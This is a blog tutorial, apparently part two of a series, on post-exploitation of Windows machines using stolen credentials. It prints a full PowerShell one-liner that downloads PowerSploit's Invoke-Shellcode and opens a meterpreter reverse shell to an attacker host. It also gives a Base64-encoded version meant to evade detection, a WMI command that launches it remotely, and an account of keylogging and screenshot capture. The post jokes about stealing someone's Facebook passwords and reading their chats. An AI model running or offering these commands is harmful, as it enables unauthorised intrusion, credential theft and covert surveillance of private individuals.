i Penetration Test – Exploit the network of a victim ( Part 2 ) – All things in moderation

# Penetration Test – Exploit the network of a victim ( Part 2 )

In the previous post, I think you guys could have a victim’s credential on their network. Now, it is time to do what we want, I mean post exploitation. First, I will focus on Windows systems, because it’s so popular nowadays, right? 😀

Actually, Microsoft guys help us a lot, because we are going to use PowerShell or WMI to exploit the system. PowerSploit is a PowerShell framework of modules that is created by Matt Graeber. You can get it here, they also add Visual Studio project file for us. I don’t want to tell you how poweful PowerShell is, you should try and feel it by yourself. And you shouldn’t forget, if we have have a valid local administrative credentials and on the target’s network. We could use PowerShell to force a user to download and invoke a PowerShell script and gain reverse shell. So what is the code that we are going to run on a victim ? That is here.

• Image Invoke-Shellcode.ps1

This Invoke-Shellcode.ps1 file is going to inject malicious code into notepad.exe file ( for example ), and then connect back to our host.
But we should turn on our listener first by run a script called StartListener.py.

• Image StartListener.py

This script will also migrate with the process when a victim host connects back to our host. But first, we need to run Invoke-Shellcode.ps1 on this victim’s computer remotely. Our code is here:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.120 -Lport 443 -Force


The IEX command will tell PowerShell download Invoke-Shellcode.ps1 from GitHub and connect back to our host at address: 192.168.10.103 over port 443. Secondly, keep in minds, some connections can be track on the victim’s computer, so we need to encode our command to avoid it. We could use Base64 encode to do this. Because the input of this file is a text file, so we need to put it in a file and then encode it.

• Image create ps_encoder.py input file.

And our command above becomes:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAwADMAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=


Then we use Powershell to run this script remotely.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAwADMAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=" -ComputerName WIN-BK58LSTG3KP -Credential Stephen


If your credential has been successfully completed, you can do whatever script on the victim host. For example: keylogging, dump memory from a process, take a screen shot, get SSIDs and passwords of their wifi connections,…

When our command successed, we could see the connect back to our listener from a victim:

Then we use Metasploit to run a few dirty commands:

• Find out what Metasploit could help us:

• Get information of their system:

• Turn on keylogging to find out what are we type:

• And some screenshots for fun:

Here is our victim’s screenshots:

With this feature, you guys could take their Facebook ID, passwords and find out what he is chatting with your girlfriend by keylogging so easily, right ?

### Some tips:

First, you need to know ComputerName of the remote computer

For this thing works, we need to run some commands in the remote computer and local computer
– On both computers:
Firstly, Check if Windows Remote Management Service is running:

If it is not running, we go to services.msc and turn it on.

Additionally, we need to set this service starts automatically in the remote victim.

Secondly, we need to run this command in both computers.

And then your PowerShell is not going to ask any lame question like that:

Thirdly, you guys need to configure Windows PowerShell for remoting, type the following command:

• On Your Attacker’s computer, you need to run this command:

Because if the remote computer is not in a trusted domain, the remote computer might not be able to authenticate your credentials. To enable authentication, you need to add the remote computer to the list of trusted hosts for the local computer in WinRM. To do so, type:

With my tips, I think your environment could do all our stuffs without any errors.

Now, you guys should practise with this Powershell and find out how it works. I think you guys will meet some little issues when working with this tool, so please inform me when you have it. I always here for help. 🙂